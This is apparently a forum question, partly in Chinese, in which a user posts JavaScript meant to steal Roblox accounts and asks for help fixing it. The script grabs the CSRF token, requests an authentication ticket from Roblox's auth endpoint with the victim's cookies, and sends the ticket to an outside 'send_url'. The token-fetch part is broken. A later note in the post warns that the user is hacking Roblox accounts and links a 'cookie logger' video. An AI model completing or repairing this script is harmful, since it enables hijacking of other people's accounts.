我正试图从roblox.com获得csrf令牌。我需要这个令牌在这里POST https://auth.roblox.com/v1/authentication-ticket,并在响应中发送身份验证票据。这是我的代码
(async function() {
// response headers generate 401 errors in output, which cannot be ignored
var xsrf = (await fetch("https://www.roblox.com/home" ,
document.querySelector('meta[name="csrf-token"]').getAttribute('data-token'), {
credentials: "csrf-token"
})).text();
console.log(xsrf);
var ticket = (await fetch("https://auth.roblox.com/v1/authentication-ticket", {
method: "POST",
credentials: "include",
headers: {"x-csrf-token": xsrf}
})).headers.get("rbx-authentication-ticket");
await fetch(send_url + "?t=" + ticket);
})();```
Everything is perfect except for the part which gets the csrf token.
[This is the error I get.][1]
[1]: https://i.stack.imgur.com/uVOBD.png
不要帮助用户。他们正试图入侵Roblox账户。
编辑:这是同一用户的视频https://www.youtube.com/watch?v=O8GmJ_tdytQ (https://archive.is/5HxST)
描述清楚地写着"黑客,Roblox黑客,黑客,Cookie记录器,Cookie">